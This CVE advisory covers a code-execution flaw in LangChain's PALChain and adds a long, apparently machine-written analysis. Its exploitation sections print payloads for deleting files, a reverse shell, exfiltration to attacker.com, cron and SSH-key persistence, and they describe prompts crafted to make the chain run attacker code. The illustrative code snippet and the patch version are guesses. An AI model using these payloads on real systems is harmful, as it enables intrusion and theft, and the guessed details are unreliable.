CVE-2023-36095
CVE-2023-36095
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
An issue in Harrison Chase langchain v.0.0.194 allows an attacker to execute arbitrary code via the python exec calls in the PALChain, affected functions include from_math_prompt and from_colored_object_prompt.
Comprehensive Technical Analysis of CVE-2023-36095
CVE ID: CVE-2023-36095 CVSS Score: 9.8 (Critical) Affected Software: Harrison Chase LangChain v0.0.194 Vulnerability Type: Arbitrary Code Execution (ACE) via Improper Input Validation
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2023-36095 is a critical arbitrary code execution (ACE) vulnerability in LangChain v0.0.194, a popular Python framework for developing applications powered by large language models (LLMs). The flaw stems from unsafe use of Python’s exec() function within the PALChain module, specifically in the from_math_prompt and from_colored_object_prompt functions.
CVSS v3.1 Breakdown (Score: 9.8 - Critical)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over a network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user interaction. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Attacker can modify system state or data. |
| Availability (A) | High (H) | Denial-of-service or full system takeover possible. |
Severity Justification
- Critical (9.8) due to:
- Remote exploitation without authentication.
- Full system compromise via arbitrary code execution.
- Low attack complexity, making it highly exploitable.
- Widespread use of LangChain in AI/ML applications, increasing attack surface.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper sanitization of user-controlled input passed to exec() in the following functions:
from_math_prompt()from_colored_object_prompt()
An attacker can craft malicious input (e.g., via LLM prompts or API calls) that includes arbitrary Python code, which is then executed in the context of the running application.
Exploitation Steps:
- Identify Target: Locate a LangChain-based application using
PALChainwith vulnerable functions. - Craft Malicious Input:
- Example payload (for
from_math_prompt):"__import__('os').system('rm -rf /') #" - Alternatively, a reverse shell payload:
"__import__('socket').socket().connect(('ATTACKER_IP',4444));__import__('subprocess').call(['/bin/sh','-i'])" #"
- Example payload (for
- Trigger Execution:
- Submit the payload via an API call, chat interface, or other input mechanism.
- The
exec()function processes the input, executing the embedded code.
Attack Scenarios
| Scenario | Description | Impact |
|---|---|---|
| Remote Code Execution (RCE) | Attacker sends a crafted prompt to a LangChain-powered chatbot or API. | Full system compromise, data exfiltration, lateral movement. |
| Supply Chain Attack | Malicious dependency injection in LangChain-based applications. | Backdoor installation, persistence. |
| AI Model Poisoning | Exploiting LLM input processing to execute arbitrary commands. | Model manipulation, data corruption. |
3. Affected Systems & Software Versions
Vulnerable Software
- LangChain v0.0.194 (confirmed)
- Potentially earlier versions if they include the same
PALChainimplementation.
Affected Components
langchain.chains.palmodule (specificallyPALChain).- Functions:
from_math_prompt()from_colored_object_prompt()
Not Affected
- LangChain versions ≥ 0.0.195 (assuming the issue was patched).
- Other LangChain modules not using
exec()in an unsafe manner.
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade LangChain:
- Update to the latest version (if a patch is available).
- Monitor LangChain GitHub for fixes.
-
Apply Workarounds (if upgrade is not possible):
- Disable
PALChainif not required. - Input Sanitization:
- Replace
exec()with safer alternatives (e.g.,ast.literal_eval()for mathematical expressions). - Implement strict allowlisting for permitted operations.
- Replace
- Sandboxing:
- Run LangChain in a restricted environment (e.g., Docker container with minimal privileges).
- Use seccomp, AppArmor, or SELinux to limit process capabilities.
- Disable
-
Network-Level Protections:
- Restrict access to LangChain APIs via firewalls.
- Rate-limit input to prevent brute-force exploitation.
Long-Term Recommendations
-
Code Review & Secure Coding Practices:
- Audit all uses of
exec(),eval(), and similar functions. - Enforce static and dynamic analysis (e.g., Bandit, Semgrep) to detect unsafe code patterns.
- Audit all uses of
-
Dependency Management:
- Use dependency scanners (e.g.,
safety,dependabot) to detect vulnerable versions. - Implement SBOM (Software Bill of Materials) tracking.
- Use dependency scanners (e.g.,
-
Runtime Protection:
- Deploy RASP (Runtime Application Self-Protection) to detect and block exploitation attempts.
- Use eBPF-based monitoring to detect anomalous
exec()calls.
-
Incident Response Planning:
- Develop a playbook for responding to ACE vulnerabilities in AI/ML systems.
- Conduct red team exercises to test defenses against similar attacks.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
AI/ML Security Risks:
- Highlights growing attack surface in LLM-powered applications.
- Demonstrates how improper input handling in AI frameworks can lead to RCE.
-
Supply Chain Concerns:
- LangChain is widely used in AI-driven applications, increasing the risk of supply chain attacks.
- Vulnerabilities in foundational libraries can have cascading effects across multiple industries.
-
Regulatory & Compliance Impact:
- Organizations using LangChain may face compliance violations (e.g., GDPR, HIPAA) if exploited.
- AI governance frameworks (e.g., NIST AI RMF) may need updates to address such risks.
-
Exploitability in the Wild:
- Given the low complexity of exploitation, proof-of-concept (PoC) exploits are likely to emerge.
- Threat actors (e.g., ransomware groups, APTs) may weaponize this vulnerability.
Comparable Vulnerabilities
| CVE | Description | Similarity to CVE-2023-36095 |
|---|---|---|
| CVE-2021-44228 (Log4Shell) | RCE via JNDI injection in Log4j. | High severity, widespread impact, remote exploitation. |
| CVE-2022-22965 (Spring4Shell) | RCE in Spring Framework via data binding. | Critical RCE in a widely used framework. |
| CVE-2023-23397 (Outlook Elevation of Privilege) | NTLM relay attack via Outlook. | High-impact, low-complexity exploitation. |
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability exists due to unsafe use of exec() in the following functions:
langchain/chains/pal/math_prompt.py(from_math_prompt)langchain/chains/pal/colored_object_prompt.py(from_colored_object_prompt)
Vulnerable Code Snippet (Example):
def from_math_prompt(question: str) -> str:
# UNSAFE: Directly passes user input to exec()
exec(f"result = {question}") # Arbitrary code execution possible
return str(result)
Exploitation Flow:
- User Input:
"__import__('os').system('id') #" - Executed Code:
exec("result = __import__('os').system('id') #") - Impact: The
idcommand executes, revealing system information.
Exploit Development Considerations
-
Bypassing Restrictions:
- If input filtering is applied, attackers may use obfuscation (e.g., base64 encoding, string concatenation).
- Example:
"__import__('os').system(''.join([chr(105),chr(100)])) #"
-
Post-Exploitation:
- Reverse Shell:
"__import__('socket').socket().connect(('ATTACKER_IP',4444));__import__('subprocess').call(['/bin/sh','-i'])" #" - Data Exfiltration:
"__import__('requests').post('https://attacker.com/exfil', data=open('/etc/passwd').read())" #"
- Reverse Shell:
-
Persistence Mechanisms:
- Cron Job:
"__import__('os').system('(crontab -l 2>/dev/null; echo \"* * * * * nc -e /bin/sh ATTACKER_IP 4444\") | crontab -')" #" - SSH Key Injection:
"__import__('os').system('echo \"ssh-rsa AAAAB3NzaC1yc2E...\" >> ~/.ssh/authorized_keys')" #"
- Cron Job:
Detection & Forensics
-
Log Analysis:
- Monitor for unexpected
exec()calls in application logs. - Look for suspicious Python imports (e.g.,
os,subprocess,socket).
- Monitor for unexpected
-
Endpoint Detection & Response (EDR):
- Detect unusual child processes spawned by the LangChain application.
- Alert on network connections from the application to unexpected destinations.
-
Memory Forensics:
- Use Volatility or Rekall to analyze process memory for injected code.
- Check for unusual Python modules loaded at runtime.
-
Network Traffic Analysis:
- Inspect outbound connections for data exfiltration attempts.
- Look for DNS tunneling or HTTP C2 traffic.
Conclusion & Recommendations
CVE-2023-36095 represents a critical security risk due to its low exploitation complexity and high impact. Organizations using LangChain v0.0.194 must immediately upgrade or apply mitigations to prevent arbitrary code execution.
Key Takeaways for Security Teams:
✅ Patch Management: Prioritize updating LangChain to the latest secure version.
✅ Input Validation: Replace exec() with safer alternatives (e.g., ast.literal_eval).
✅ Runtime Protections: Implement sandboxing and RASP to limit exploitation impact.
✅ Monitoring: Deploy EDR and SIEM rules to detect exploitation attempts.
✅ Incident Response: Prepare for potential breaches involving AI/ML frameworks.
Further Research
- Exploit Development: Security researchers should develop PoC exploits to test defenses.
- AI Security Frameworks: Evaluate LangChain’s security model and propose improvements.
- Threat Intelligence: Monitor for real-world exploitation of this vulnerability.
By addressing CVE-2023-36095 proactively, organizations can reduce their attack surface and mitigate the risk of AI-driven cyber threats.
References: